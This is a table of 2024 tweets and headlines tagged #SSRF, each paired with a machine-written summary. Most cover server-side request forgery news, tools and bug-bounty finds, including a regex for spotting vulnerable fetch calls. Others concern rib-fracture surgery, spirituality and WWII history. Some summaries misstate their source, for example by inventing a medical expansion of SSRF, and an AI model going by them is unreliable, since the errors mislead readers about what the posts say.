| 683 | 2024-10-08 06:28:44 UTC | mutantera0: Simple script to chain SSRF issues with arbitrary HTTP redirect (with auth header) to trigger leaking sensitive headers. Github: #Cybersecurity #InfosecTools #EthicalHacking #PenTesting #CTF #VulnerabilityHunting #SSRF #bugbountytips #bugbountytools | The content discusses a script called mutantera0 that chains SSRF issues with an arbitrary HTTP redirect using an auth header to expose sensitive headers. The script is available on GitHub and is relevant to cybersecurity, ethical hacking, penetration testing, CTF challenges, vulnerability hunting, and bug bounty programs. The focus is on exploiting SSRF vulnerabilities to leak sensitive information. The Twitter link provides more details. |
| 684 | 2024-10-01 22:58:37 UTC | Eth1calHackrZ: 11/14 Educate #Yourself: Understanding how #attacks like #SSRF and #XSS work can better prepare you for defending against them. #KnowledgeIsPower #CyberEducation | The content emphasizes the importance of educating oneself on attacks like SSRF and XSS to enhance defense strategies. It highlights the significance of knowledge in cybersecurity and encourages individuals to learn about these attack methods for better preparedness. The tweet suggests that understanding how these attacks work can empower individuals to defend against them effectively. Eth1calHackrZ promotes the idea that education is key in the realm of cybersecurity. |
| 685 | 2024-10-01 20:43:57 UTC | @Eth1calHackrZ: 5/14 Universal #Exploit: #Manipulating the "x-forwarded-proto" header led to #fullresponse #SSRF and #XSS across all "@netlify/ipx" setups. Learn how! #CyberAttack #Web3Vulnerabilities | The content discusses a universal exploit discovered by @Eth1calHackrZ on 5/14 involving manipulating the "x-forwarded-proto" header, leading to full response SSRF and XSS vulnerabilities across all "@netlify/ipx" setups. The post highlights the potential cyber attack risks and web vulnerabilities associated with this exploit. It encourages learning more about the exploit and its implications. |
| 686 | 2024-10-01 20:43:55 UTC | @Eth1calHackrZ: 4/14 Image Optimization Gone Wrong: Delve into how "@netlify/ipx" allowed #SSRF & #XSS attacks due to improper #URL parsing. #ServerSideRequestForgery #CrossSiteScripting #NetlifySecurity | The content discusses a security issue with "@netlify/ipx" that led to SSRF and XSS attacks due to improper URL parsing. The tweet highlights the vulnerability and mentions the hashtags #ServerSideRequestForgery, #CrossSiteScripting, and #NetlifySecurity. The post warns about the risks associated with image optimization gone wrong. |
| 687 | 2024-09-29 21:04:32 UTC | SandroBruscino: This article explains how DNS rebinding can bypass SSRF filters. Even 1 in 30 successful requests can be a game changer! #CyberSecurity #SSRF #DNSRebinding | The article by SandroBruscino discusses how DNS rebinding can circumvent SSRF filters, highlighting the significance of even a small success rate. This has implications for cybersecurity, emphasizing the potential impact of this technique. The tweet provides a link to the article for further information. |
| 688 | 2024-09-29 20:03:53 UTC | @nmkannans: As a part of my python learning created this python exploit script to run #SSRF port scans in a vulnerable Web / API endpoint that allows parameters in the request body -- #CyberSec #BugBounty #Pentesting #CyberSec #Security | The content discusses the creation of a Python exploit script by @nmkannans for running SSRF port scans on a vulnerable Web/API endpoint that accepts parameters in the request body. The script is part of the author's Python learning journey and is shared in the context of cybersecurity, bug bounty programs, pentesting, and general security awareness. The script's purpose is to identify security vulnerabilities in web applications. |
| 689 | 2024-09-28 13:58:32 UTC | SSRFspiritual: Curious about spirituality? Join the SSRF Online Spiritual Meeting! Feel inner peace gain clarity on your spiritual journey and connect with like-minded seekers. When: Sun 29 Sep 2024 at 15:00 UTC Register now: #SSRF#Spirituality | Join the SSRF Online Spiritual Meeting on Sun, 29 Sep 2024, at 15:00 UTC to explore spirituality, find inner peace, gain clarity on your spiritual journey, and connect with like-minded seekers. Register now to participate in this event focused on spiritual growth and understanding. #SSRF #Spirituality. |
| 690 | 2024-09-27 20:58:16 UTC | NYULHLI_Trauma: Trauma & Acute Care Surgeon Dr. Daphnee Beaulieu presents on Surgical Stabilization of Rib Fractures for the Geriatric Patient @ACOSurgeons #ACA2024! Our team is proudly on the forefront of management of chest wall injuries! @CWISociety #SSRF #ORIF #ChestWallInjuryCenter | Dr. Daphnee Beaulieu, a Trauma & Acute Care Surgeon, presented on "Surgical Stabilization of Rib Fractures for the Geriatric Patient" at #ACA2024. The focus was on managing chest wall injuries, highlighting the team's expertise in this area. The presentation likely covered techniques like SSRF and ORIF for chest wall injuries. The event was organized by @ACOSurgeons and @CWISociety, showcasing the team's commitment to staying at the forefront of trauma care. |
| 691 | 2024-09-27 08:13:30 UTC | @spiritualsai: @kajal_ok_ @MonaPatelT Spiritually pure dance forms like Kathak can uplift the dancer audience & environment. Mrs. Sonia Parchures aura doubled reaching 20m after performing at the Maharshi University of Spirituality. Watch here: #Kathak #Spirituality #SSRF | The post highlights how spiritually pure dance forms like Kathak can uplift dancers, audiences, and environments. It mentions Mrs. Sonia Parchure's aura doubling to 20m after performing at the Maharshi University of Spirituality. The content encourages watching the performance for insights into the connection between Kathak, spirituality, and personal energy. |
| 692 | 2024-09-26 19:08:34 UTC | @MrD3fu1t: @Medium @bountywriteups @Hacker0x01 @Bugcrowd @github Some Moment Ago I visited for Read a writeup about #xss #lfi #ssrf from @Medium when i submit that writeup link to Freedium for bypass paywall. its show Me XSS Vulnerability. | The content mentions a Twitter post by @MrD3fu1t where they visited Medium to read about XSS, LFI, and SSRF. They submitted the writeup link to Freedium to bypass a paywall, revealing an XSS vulnerability. The post includes tags for various platforms like HackerOne, Bugcrowd, and GitHub. |
| 693 | 2024-09-26 15:09:39 UTC | reverseame: SSRFing the Web with the Help of Copilot Studio #SSRF #Microsoft #CopilotStudio #Vulnerability #Critical | The content discusses SSRF (Server-Side Request Forgery) vulnerabilities in web applications, specifically using Copilot Studio from Microsoft to exploit them. The focus is on the critical nature of these vulnerabilities and their potential impact. The tweet highlights the importance of understanding and addressing SSRF vulnerabilities in web security. |
| 694 | 2024-09-25 19:04:16 UTC | cyber24x7: 10. #ThreatPatrol a #Python script based tool that can scan websites for #vulnerabilities including #SQLinjection #XSS #CSRF #SSRF #LFI and #RCE. | The content discusses cyber24x7's #ThreatPatrol, a Python script tool that scans websites for vulnerabilities like SQL injection, XSS, CSRF, SSRF, LFI, and RCE. The tool aims to enhance website security by identifying and addressing these potential threats. The tool's capabilities are highlighted in a tweet from cyber24x7. |
| 695 | 2024-09-25 13:18:48 UTC | prod42net: Unlocking SSRF potential with Peppa's insights on finding ports beyond 9001. Scan 1-65535 for valid ports watch for img tag in responses. #CyberSecurity #SSRF #PortScanning | The content discusses utilizing SSRF to find ports beyond 9001 by scanning 1-65535 for valid ports and monitoring responses for img tags. Peppa's insights are highlighted for unlocking SSRF potential. The post emphasizes cybersecurity, SSRF, and port scanning. The link provided leads to the original tweet on Twitter. |
| 696 | 2024-09-25 12:28:21 UTC | @prod42net: Peppa's latest on CBJS: SSRF 2 reveals how to access admin.php decode base64 content & display in image tag for easy reading. Don't miss this encryption tip! #CyberSecurity #SSRF #Encryption | Peppa's latest post on SSRF 2 discusses accessing admin.php, decoding base64 content, and displaying it in an image tag for easier reading. The content emphasizes an encryption tip related to cybersecurity and SSRF. The post is shared on Twitter by @prod42net. |
| 697 | 2024-09-25 02:31:52 UTC | Ivantis bug-plagued network appliances attacked using fresh exploit | Ivanti's network appliances are facing attacks due to a new exploit. The appliances have been plagued by bugs, making them vulnerable to security breaches. The fresh exploit is being used to target these appliances, posing a threat to their security. |
| 698 | 2024-09-22 16:28:48 UTC | Ke_Cyber: Don't wait for a breachsecure your site NOW before its too late! #CyberSecurity #WordPress #Kenya #DataBreach #SSRF #XSS #SQLi #GovtSites #InfoSec #UpdateNow #SecurityThreat | The content emphasizes the urgency of securing websites to prevent data breaches. It highlights the importance of taking action immediately to protect against security threats like SSRF, XSS, and SQLi. The message targets WordPress users in Kenya and government sites, urging them to update their security measures promptly. The post stresses the significance of proactive cybersecurity measures to avoid potential breaches. |
| 699 | 2024-09-20 13:23:36 UTC | true_redfence: INFORMATIONOffensive Security Tool: SSRFPwned SSRFPwned is developed by Chris Abou-Chabké from Black Hat Ethical Hacking. It is a tool that automates the process of testing for Server-Side Request Forgery (SSRF) #ssrf #offensivesecurity | SSRFPwned is an offensive security tool created by Chris Abou-Chabké from Black Hat Ethical Hacking. It automates testing for Server-Side Request Forgery (SSRF). The tool is designed to assist in identifying and addressing SSRF vulnerabilities efficiently. It aims to enhance offensive security practices by streamlining the SSRF testing process. |
| 700 | 2024-09-19 19:18:26 UTC | JaneParrish: #News: @ProtectAICorp's Vulnerability Report uncovers 20 #security #flaws in #opensource #tools used for building #AI/#ML systems - incl Remote Code Execution #RCE in BerriAI/litellm password reset in lunary-ai/lunary and #SSRF in gradio-app/gradio | @ProtectAICorp's Vulnerability Report reveals 20 security flaws in open-source tools for AI/ML systems. Issues include Remote Code Execution in BerriAI/litellm, password reset vulnerability in lunary-ai/lunary, and Server-Side Request Forgery in gradio-app/gradio. This poses risks to the security of AI projects. |
| 701 | 2024-09-19 00:13:10 UTC | iototsecnews: Ivanti EPM の脆弱性 CVE-2024-29847 などが FIXRCE が生じる恐れ #IvantiCloudServiceAppliance #IvantiCSA #IvantiEndpointManagement #IvantiEPM #IvantiWorkspaceControl #IWC #RCE #SSRF #Vulnerability #ZeroDay | The content discusses a vulnerability (CVE-2024-29847) in Ivanti EPM that could lead to a Remote Code Execution (RCE) issue. It mentions hashtags related to Ivanti products and security terms like SSRF, Vulnerability, and ZeroDay. The post warns about the potential risk posed by this vulnerability. |
| 702 | 2024-09-18 13:13:48 UTC | Cybersleuth254: Found an SSRF vulnerability using a custom Nuclei template! This bug allows attackers to inject malicious URLs and access sensitive data on the server. #Cybersecurity #SSRF #BugBounty #PenTesting #Infosec #Nuclei | Cybersleuth254 discovered an SSRF vulnerability using a custom Nuclei template, enabling attackers to inject malicious URLs and access sensitive server data. The finding highlights the importance of cybersecurity measures like bug bounties, penetration testing, and information security. #Cybersecurity #SSRF #BugBounty #PenTesting #Infosec #Nuclei. |
| 703 | 2024-09-18 13:13:48 UTC | Cybersleuth254: Found an SSRF vulnerability using a custom Nuclei template! This bug allows attackers to inject malicious URLs and access sensitive data on the server. Always validate inputs to prevent these threats! #Cybersecurity #SSRF #BugBounty #PenTesting #Infosec #Nuclei | Cybersleuth254 discovered an SSRF vulnerability using a custom Nuclei template, enabling attackers to inject malicious URLs and access sensitive server data. The importance of input validation to prevent such threats is emphasized. The post highlights cybersecurity, SSRF, bug bounty, penetration testing, and Nuclei. |
| 704 | 2024-09-17 02:04:13 UTC | iototsecnews: MindsDB の脆弱性 CVE-2024-24759 が FIXPoC エクスプロイトも提供 #AIML #DNSRebinding #Exploit #MindsDB #OpenSource #PoCExploit #Sim4n6 #SSRF #Vulnerability | The content discusses a vulnerability (CVE-2024-24759) in MindsDB, an open-source AI tool. It mentions the availability of a FIXPoC exploit for this vulnerability. The post includes hashtags related to artificial intelligence, machine learning, DNS rebinding, exploit, vulnerability, and SSRF. The vulnerability and exploit details are shared on Twitter by iototsecnews. |
| 705 | 2024-09-15 07:53:39 UTC | spencer_5cent: 1/2 For bug bounty I finally moved away from @SynackRedTeam even though I love and respect the platform I just wasn't getting any bugs. So in the past month I've already reported two #SSRF and one #blindxss on @Hacker0x01! | The content discusses a bug bounty hunter named spencer_5cent who switched from SynackRedTeam to Hacker0x01 due to lack of bugs. In the past month, they reported two Server-Side Request Forgery (#SSRF) and one Blind Cross-Site Scripting (#blindxss) vulnerabilities on Hacker0x01. The tweet expresses gratitude towards SynackRedTeam while highlighting the success on the new platform. |
| 706 | 2024-09-13 21:48:34 UTC | e0xsecops: #CocaCola @CocaCola #SSRF | The content refers to a tweet by e0xsecops about CocaCola and SSRF (Server-Side Request Forgery). The tweet includes hashtags for CocaCola and SSRF, along with a link to the specific tweet on Twitter. It suggests that there may be some relevant information or discussion related to CocaCola and SSRF in the linked tweet. |
| 707 | 2024-09-13 16:49:30 UTC | @killmongar1996: New blog: Found multiple SSRF vulnerabilities on a banks system exposing AWS metadata! Learn how I uncovered these flaws and the security risks involved. Check it out! [] #CyberSecurity #AWS #SSRF #EthicalHacking #CloudSecurity | A new blog post by @killmongar1996 discusses discovering multiple SSRF vulnerabilities in a bank's system, exposing AWS metadata. The post details how these flaws were uncovered and the associated security risks. The content highlights the importance of addressing these vulnerabilities to enhance cybersecurity. The post is shared on Twitter with hashtags like #CyberSecurity, #AWS, #SSRF, #EthicalHacking, and #CloudSecurity. The link to the blog post is provided for those interested in learning more about the findings. |
| 708 | 2024-09-13 00:43:35 UTC | CWISociety: CWIS Chairman of the Board of Directors @dotu3535. Management of Rib Fractures session presenting Surgical Stabilization of Rib Fracture Guidelines: Where are we?. Way to go Chairman! #cwismember #cwismemberresearch #ssrf | The content highlights the CWIS Chairman of the Board of Directors presenting on the topic of "Surgical Stabilization of Rib Fracture Guidelines" during a session on the Management of Rib Fractures. The post congratulates the Chairman on the presentation. The hashtags #cwismember, #cwismemberresearch, and #ssrf are used in the post. |
| 709 | 2024-09-13 00:43:34 UTC | CWISociety: .@saranimd is leading the World Trauma Congress session Scientific Session VIIIA: Management of Rib Fractures. Here we go! #cwismember #ssrf | Dr. Sarani is leading a session on the Management of Rib Fractures at the World Trauma Congress. The event is part of Scientific Session VIIIA. This update was shared by CWISociety on Twitter, highlighting Dr. Sarani's involvement in the congress. The post also includes hashtags #cwismember and #ssrf. |
| 710 | 2024-09-12 19:49:24 UTC | @MosharrofMahin: ChatGPT - Server Side Request Forgery (CVE-2024-27564) #ChatGPT #ssrf #CyberSecurity #bug | The content discusses a Server Side Request Forgery (SSRF) vulnerability in ChatGPT, identified as CVE-2024-27564 by @MosharrofMahin. The post highlights the cybersecurity issue and its potential impact, emphasizing the importance of addressing such vulnerabilities to prevent exploitation. The tweet includes relevant hashtags like #ChatGPT, #ssrf, #CyberSecurity, and #bug, indicating the focus on security concerns and bug reporting. For more details, the original tweet can be found at the provided Twitter link. |
| 711 | 2024-09-12 18:39:37 UTC | CWISociety: .@thefighter_sm is making magic happen while addressing Management of Rib Fractures: The European perspective. #ssrf | The CWISociety highlights @thefighter_sm's work on managing rib fractures from a European perspective. The tweet acknowledges their efforts in addressing this topic and making a positive impact. The post includes applause emojis and a hashtag for the topic discussed. The content suggests that @thefighter_sm is achieving success in this area. |
| 712 | 2024-09-12 18:39:35 UTC | sudosu01: It might not happen today in a weeks time months or year - but remember each day is a step towards achieving that big win either through #RCE #CSRF #SSRF #SubDomainTakeover #SQL_Injection #WAFbypass -- keep waking up to that website until that big win! #sudo #bug | The content emphasizes the persistence required in cybersecurity, stating that achieving success through vulnerabilities like RCE, CSRF, SSRF, SubDomainTakeover, SQL Injection, and WAFbypass may take time. It encourages daily effort towards the goal and mentions the importance of staying dedicated until the big win is achieved. The use of hashtags like #sudo and #bug highlights the focus on security testing and bug hunting. |
| 713 | 2024-09-12 17:39:32 UTC | CWISociety: CWIS President @saranimd is acing the assignment. SSRF: When and how? Well done sir! #cwismember #cwismemberresearch #ssrf | CWIS President @saranimd excels in an assignment on SSRF. The post praises his performance and asks about the timing and method of SSRF. The content is shared on CWISociety's Twitter account, highlighting the president's success and involvement in research. The hashtags #cwismember, #cwismemberresearch, and #ssrf are used to categorize the post. |
| 714 | 2024-09-12 17:39:31 UTC | CWISociety: Past-President @zmbauman is moderating the World Trauma Congress Scientific Session IV: Management of Rib Fractures this morning. Packed house! #cwismember #cwismemberresearch #ssrf | The past-president of CWISociety, @zmbauman, is moderating the World Trauma Congress session on managing rib fractures. The event is well-attended. The post includes hashtags #cwismember, #cwismemberresearch, and #ssrf. |
| 715 | 2024-09-12 15:44:20 UTC | @turkhacksths: Server-Side Request Forgery (SSRF) Nedir ? SSRF sunucuyu kullanarak başka bir sunucuya veya servise (dış ağda ya da iç ağda) istek yapmasına olanak tanır. Bu istekler genellikle HTTP FTP SMB gibi protokollerle yapılır. #SSRF #Hacking #CyberSecurity | The content discusses Server-Side Request Forgery (SSRF), which allows a server to make requests to another server or service, either in an external or internal network. These requests are typically made using protocols like HTTP, FTP, and SMB. The post emphasizes the importance of understanding SSRF for cybersecurity and hacking purposes. |
| 716 | 2024-09-11 20:28:13 UTC | @BanCERT_gt: Una vulnerabilidad SSRF (Server-Side Request Forgery) fue descubierta en Microsoft Copilot Studio poniendo en riesgo la seguridad de datos confidenciales y sistemas internos. Fuente: #BanCERT #Ciberseguridad #SSRF #MicrosoftCopilot #Vulnerabilidad | A Server-Side Request Forgery (SSRF) vulnerability was found in Microsoft Copilot Studio by @BanCERT_gt, posing a risk to confidential data and internal systems. The discovery highlights potential security threats. #BanCERT #Cybersecurity #SSRF #MicrosoftCopilot #Vulnerability |
| 717 | 2024-09-10 20:05:27 UTC | @SEIDX57: Day 19 of the 25-day #THM challenge complete! Today I learned about Server-Side Request Forgery (SSRF). This vulnerability allows attackers to trick a server into making unauthorized requests to internal resources. Understanding it is key to preventing data breaches. #SSRF | The content discusses Day 19 of a challenge where the user learned about Server-Side Request Forgery (SSRF), a vulnerability that allows attackers to manipulate servers into making unauthorized requests to internal resources. Understanding SSRF is crucial in preventing data breaches. The user emphasizes the importance of awareness and knowledge about SSRF to enhance cybersecurity. |
| 718 | 2024-09-10 14:19:10 UTC | qldfes: #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #bounty #hacker #vulnerability #ssrf #vdp #security #securityresearch #bughunter #researcher #pentester #pentesting #cybersecurity #VAPT | The content is a tweet from qldfes including various hashtags related to bug bounty programs, cybersecurity, and vulnerability testing. The tweet likely contains information or updates related to bug bounty tips, hacker communities like HackerOne and Bugcrowd, security research, and penetration testing. The tweet's content can be found by visiting the provided Twitter link. |
| 719 | 2024-09-10 11:32:19 UTC | Critical server-side vulnerability in Microsoft Copilot Studio gives illegal access to internal infrastructure | A critical server-side vulnerability in Microsoft Copilot Studio has been identified, allowing unauthorized access to internal infrastructure. This security flaw poses a significant risk as it could potentially be exploited by malicious actors to gain unauthorized access to sensitive data and compromise the system. Microsoft Copilot Studio users should be vigilant and take immediate action to address this vulnerability to prevent any unauthorized access to their internal infrastructure. |
| 720 | 2024-09-07 19:43:47 UTC | @TheRealB_Wayne: Gustavus Henry March-Phillipps DSO MBE (1908 12 September 1942; sometimes spelled "March-Phillips") was the founder of the British Army's No. 62 Commando also known as Small Scale Raiding Force (#SSRF) one of the forerunners of the Special Air Service (#SAS) | Gustavus Henry March-Phillipps, DSO, MBE, founded the British Army's No. 62 Commando, later known as Small Scale Raiding Force (#SSRF), a precursor to the Special Air Service (#SAS). He played a significant role in establishing these elite military units. March-Phillipps' contributions to the formation of specialized forces are noteworthy in military history. |
| 721 | 2024-09-07 04:26:43 UTC | Critical server-side vulnerability in Microsoft Copilot Studio gives illegal access to internal infrastructure | A critical server-side vulnerability in Microsoft Copilot Studio has been identified, allowing unauthorized access to internal infrastructure. This vulnerability poses a significant security risk and requires immediate attention to prevent potential exploitation by malicious actors. Organizations using Microsoft Copilot Studio should take prompt action to address this issue and enhance their security measures to safeguard their systems and data. |
| 722 | 2024-09-06 23:33:43 UTC | evert_eriksson: Super excited our article posted today in JTACS! #ssrf #cwisociety #cwis2024 #rib #jtacs Anatomy of the interchondral joints and the effects on... : Journal of Trauma and Acute Care Surgery | The content is a tweet by evert_eriksson expressing excitement about their article being published in the Journal of Trauma and Acute Care Surgery. The article discusses the anatomy of interchondral joints and their effects. Various hashtags like #ssrf, #cwisociety, #cwis2024, and #rib are included in the tweet. |
| 723 | 2024-09-06 16:52:08 UTC | Introducing the URL validation bypass cheat sheet | A new resource called the URL validation bypass cheat sheet has been introduced. It aims to provide information on bypassing URL validation. The cheat sheet can be accessed at the provided link. |
| 724 | 2024-09-06 16:24:40 UTC | DanaEpp: Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. #apihacking #ssrf | The content shared by DanaEpp discusses how to identify and exploit server-side request forgery (SSRF) vulnerabilities in an API. The article provides insights into the process of finding and exploiting SSRF vulnerabilities, offering valuable information for those interested in API hacking and security. DanaEpp's tweet includes hashtags #apihacking and #ssrf, directing readers to the article for further details on this topic. |
| 725 | 2024-09-04 15:04:29 UTC | edgescan: Are you ready to protect against Server-Side Request Forgery #SSRF attacks? Learn from real-world incidents including the Capital One data breach and discover practical mitigation strategies. Make sure your applications are not susceptible to SSRF | Learn how to defend against Server-Side Request Forgery (SSRF) attacks by understanding real-world incidents like the Capital One data breach. Discover practical mitigation strategies to ensure your applications are not vulnerable to SSRF. Stay informed and protect your systems from potential security threats. |
| 726 | 2024-09-04 14:05:21 UTC | apollocourtage: #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #bounty #hacker #vulnerability #ssrf #vdp #security #securityresearch #bughunter #researcher #pentester #pentesting #cybersecurity #VAPT | The content shared by apollocourtage on Twitter includes hashtags related to bug bounty, cybersecurity, hacker platforms, vulnerabilities, and security research. The post seems to focus on bug bounty tips, hacker platforms like HackerOne and Bugcrowd, various security terms like SSRF and VDP, as well as roles such as bug hunter, researcher, and pentester. The link provided likely leads to more information on these topics. |
| 727 | 2024-09-04 08:04:36 UTC | @SandroBruscino: Learn how attackers bypass URL validation in SSRF attacks! PortSwigger's latest cheat sheet reveals key techniques. "Understanding these flaws is critical for defending web apps." #CyberSecurity #SSRF #WebSecurity | The content discusses how attackers bypass URL validation in SSRF attacks, with PortSwigger's cheat sheet revealing key techniques. Understanding these flaws is crucial for defending web apps. The post emphasizes the importance of cybersecurity, SSRF, and web security. Sandro Bruscino's tweet highlights the significance of recognizing and preventing vulnerabilities in web applications to enhance cybersecurity measures. |
| 728 | 2024-09-03 16:58:41 UTC | @onewriteup: Advanced SSRF Security Strategies in 2024 #CyberSecurity #ssrf #BugBounty #ethicalhacking #bugbountytips | The content discusses advanced Server-Side Request Forgery (SSRF) security strategies in 2024, focusing on cybersecurity, bug bounty programs, and ethical hacking. The tweet provides insights and tips related to SSRF vulnerabilities and how to address them effectively. It aims to enhance awareness and understanding of SSRF risks and mitigation techniques within the cybersecurity community. |
| 729 | 2024-09-03 13:58:13 UTC | CWISociety: Fascinating #AI analysis predicting LOS for #SSRF pts by Dr Hon Lok (David) Lo from Taiwan. #bigdata #Berlin2024 #CWISIntl | Dr. Hon Lok (David) Lo from Taiwan presented a fascinating AI analysis predicting Length of Stay (LOS) for patients with Systemic Sclerosis-Related Fibrosing (SSRF) conditions. The analysis likely involves big data and was shared at the CWISociety event, possibly related to a conference in Berlin in 2024. The tweet highlights the innovative use of AI in healthcare to forecast patient LOS, showcasing advancements in medical research and technology. |
| 730 | 2024-09-03 12:53:54 UTC | @CWISociety: Dynamo Dr Elana Maccou @prismahealth showing new results about the benefits of improved outcomes for frail elderly trauma patients who received #SSRF. #Berlin2024 #CWISIntl | Dr. Elana Maccou from Prisma Health presented new findings on the positive impact of improved outcomes for frail elderly trauma patients who received SSRF treatment. The research was shared at the CWIS International conference, emphasizing the benefits of this approach. The tweet also mentions the upcoming event in Berlin in 2024. |
| 731 | 2024-09-01 18:43:44 UTC | Jeffrey_Mark12: This regex just found me another #0day vulnerability of #SSRF in an open source project /await fetch\(.\$/ #BugBounty #bugbountytips #ethicalhacking #Hacking | Jeffrey_Mark12 discovered a #0day vulnerability related to Server-Side Request Forgery (SSRF) using a regex in an open source project. The regex pattern used was /await fetch\(.*\`$/. This finding was shared on Twitter with hashtags like #BugBounty, #bugbountytips, #ethicalhacking, and #Hacking. The tweet can be found at the link: https://twitter.com/Jeffrey_Mark12/status/1830302403905687855. |
| 732 | 2024-09-01 11:43:30 UTC | @zapstiko: Read From SSRF to RFI: Exploiting a Vulnerability to Gain Remote Code Execution by Muhammad Qasim on Medium: #bugbountytips #bugbounty #SSRF #RCE | The content discusses an article titled "From SSRF to RFI: Exploiting a Vulnerability to Gain Remote Code Execution" by Muhammad Qasim on Medium. It covers insights on exploiting a vulnerability to achieve Remote Code Execution (RCE) through Server-Side Request Forgery (SSRF) and Remote File Inclusion (RFI). The post is related to bug bounty tips and highlights the importance of understanding and mitigating these security risks. The link provided leads to the original article on Medium. |
| 733 | 2024-08-31 06:33:43 UTC | @KonwarAbhi98099: Small Bug Tip Most of the injection related vulnerabilities have a unique category called "blind" All are searching for the classic ones. Few hunting for Blind Blind SQLi Blind XSS Blind SSRF #bugbountytips #bugbounty #vulnerability #rxss #xss #sqli #ssrf | The content discusses a bug tip related to injection vulnerabilities, highlighting the unique category of "blind" vulnerabilities. It mentions that many focus on classic vulnerabilities, while only a few are hunting for blind SQLi, XSS, and SSRF vulnerabilities. The post includes hashtags related to bug bounty tips, vulnerability types, and specific vulnerabilities like XSS, SQLi, and SSRF. The content is shared on Twitter by user @KonwarAbhi98099. |
| 734 | 2024-08-31 05:31:29 UTC | Tenable finds critical flaw in Microsofts Copilot Studio | Tenable discovered a critical flaw in Microsoft's Copilot Studio. The vulnerability poses a significant risk and requires immediate attention. Further details about the nature of the flaw and potential impacts are not provided in the summary. |
| 735 | 2024-08-30 14:34:26 UTC | SOEhistory: Major Anders Lassen earlier served with No. 62 Commando (also known as the Small Scale Raiding Force). SSRF (1941-43) formed around a small group of commandos under the command of SOE. #AndersLassen #62Commando #SSRF #SOE #WW2 | Major Anders Lassen, a member of No. 62 Commando (Small Scale Raiding Force), served under SOE during WW2. The SSRF was a specialized unit formed between 1941-43, operating under SOE's command. Anders Lassen's involvement highlights his significant role in covert operations during the war. #AndersLassen #62Commando #SSRF #SOE #WW2. |
| 736 | 2024-08-30 13:28:42 UTC | @cyb3rshi3ld: Q: In cybersecurity what does a Server-Side Request Forgery (SSRF) attack seek to exploit? A) Misconfigured firewalls B) Weak password policies C) Remote server vulnerabilities D) Validation of server-side requests #cybersecurity #infosec #SSRF #hacking | A Server-Side Request Forgery (SSRF) attack exploits remote server vulnerabilities by manipulating server-side requests. It does not target misconfigured firewalls or weak password policies. This type of attack is a concern in cybersecurity and hacking. |
| 737 | 2024-08-29 15:51:37 UTC | Tenable finds critical flaw in Microsofts Copilot Studio | Tenable discovered a critical flaw in Microsoft's Copilot Studio. The vulnerability was identified as severe, potentially impacting the security of the software. This finding highlights the importance of ongoing security assessments and the need for prompt patching to prevent exploitation by malicious actors. |
| 738 | 2024-08-29 02:28:17 UTC | @iototsecnews: Microsoft Copilot Studio の脆弱性 CVE-2024-38206深刻な情報漏洩を修正 #AIML #Cloud #Copilot #Microsoft #SSRF #Tenable #Vulnerability | The content discusses a vulnerability (CVE-2024-38206) in Microsoft Copilot Studio that has been fixed to prevent serious information leakage. The issue was related to SSRF (Server-Side Request Forgery). The post highlights the importance of addressing vulnerabilities promptly to prevent data breaches. The hashtags #AIML, #Cloud, #Copilot, #Microsoft, #SSRF, #Tenable, and #Vulnerability are used to categorize the content. |
| 739 | 2024-08-28 18:22:09 UTC | Microsoft Copilot Studio Vulnerability Could Expose Sensitive Data | A vulnerability in Microsoft Copilot Studio has been identified that could potentially expose sensitive data. This security flaw poses a risk of unauthorized access to confidential information. It is crucial for users of Copilot Studio to be aware of this vulnerability and take necessary precautions to protect their data. Microsoft may release updates or patches to address this issue, and users should stay informed about any developments to ensure the security of their information. |
| 740 | 2024-08-28 18:22:08 UTC | NTLM Credential Theft in Python Windows Applications | The content discusses the vulnerability of NTLM credential theft in Python Windows applications. It highlights the risk of unauthorized access to sensitive information due to this security flaw. The article likely delves into the technical details of how this exploit can be used by attackers to steal credentials and compromise systems. It serves as a warning to developers and users about the importance of securing their applications to prevent such breaches. |
| 741 | 2024-08-28 02:16:59 UTC | Tenable finds critical flaw in Microsofts Copilot Studio | Tenable discovered a critical flaw in Microsoft's Copilot Studio. The vulnerability was identified by Tenable researchers, highlighting potential security risks in the software. This finding underscores the importance of thorough security assessments and prompt patching to protect against potential cyber threats. |
| 742 | 2024-08-27 21:18:57 UTC | MsAcosta06: 6th grade ELA classes did a great job with their silent reading in the library today! #LearnersAtWork #SSRF | MsAcosta06 praised 6th-grade ELA classes for their successful silent reading session in the library. The students were engaged in reading, showcasing their dedication to learning. The post highlights the importance of silent sustained reading (#SSRF) and emphasizes the students' commitment to their education as active learners (#LearnersAtWork). |
| 743 | 2024-08-27 14:18:17 UTC | DailyDarkWeb: Web Attacks (SSRF) #cybersecurity #infosec #cyberattack #web #ssrf | The content refers to DailyDarkWeb discussing Web Attacks, specifically Server-Side Request Forgery (SSRF). The post is related to cybersecurity, infosec, cyberattacks, and web security, highlighting the importance of protecting against SSRF attacks. The link provided leads to the tweet on Twitter for more information. |
| 744 | 2024-08-26 19:18:39 UTC | @davidwillisowen: SSRF in Microsoft Copilot! #ssrf #tenable #copilot #bugbounty | The tweet by @davidwillisowen highlights a Server-Side Request Forgery (SSRF) vulnerability found in Microsoft Copilot, a tool developed by Microsoft. This vulnerability could potentially be exploited by attackers. The tweet mentions the bug bounty program and includes relevant hashtags like #ssrf, #tenable, #copilot, and #bugbounty. For more details, refer to the original tweet at the provided link. |
| 745 | 2024-08-26 01:21:15 UTC | Tenable Team Unearths Critical Vulnerability in Microsoft Copilot Studio - Australian Cyber Security Magazine | The Tenable team discovered a critical vulnerability in Microsoft Copilot Studio, as reported by the Australian Cyber Security Magazine. The vulnerability poses a significant risk to the security of the software. For more details, refer to the original article at the provided link. |
| 746 | 2024-08-25 06:53:56 UTC | @smugnier: [#Infosec][#Microsoft] L'exploitation de Microsoft #CopilotStudio permet d'accéder à des #données sensibles du #cloud. "Un bug #SSRF dans l'outil de création de #Copilot personnalisée a potentiellement exposé des informations critiques" | Exploiting Microsoft CopilotStudio allowed access to sensitive cloud data due to a SSRF bug in the custom Copilot creation tool. This vulnerability potentially exposed critical information. The tweet highlights the security issue and its implications. |
| 747 | 2024-08-24 14:43:50 UTC | chux13786509: This regex just found me another #0day vulnerability of #SSRF in an open source project /await fetch\(.\$/ #BugBounty #bugbountytips #ethicalhacking #Hacking | A user named chux13786509 discovered a #0day vulnerability related to Server-Side Request Forgery (#SSRF) in an open source project using a specific regex pattern. The vulnerability was found with the regex /await fetch\(.*\`$/ and was shared on Twitter with hashtags #BugBounty, #bugbountytips, #ethicalhacking, and #Hacking. |
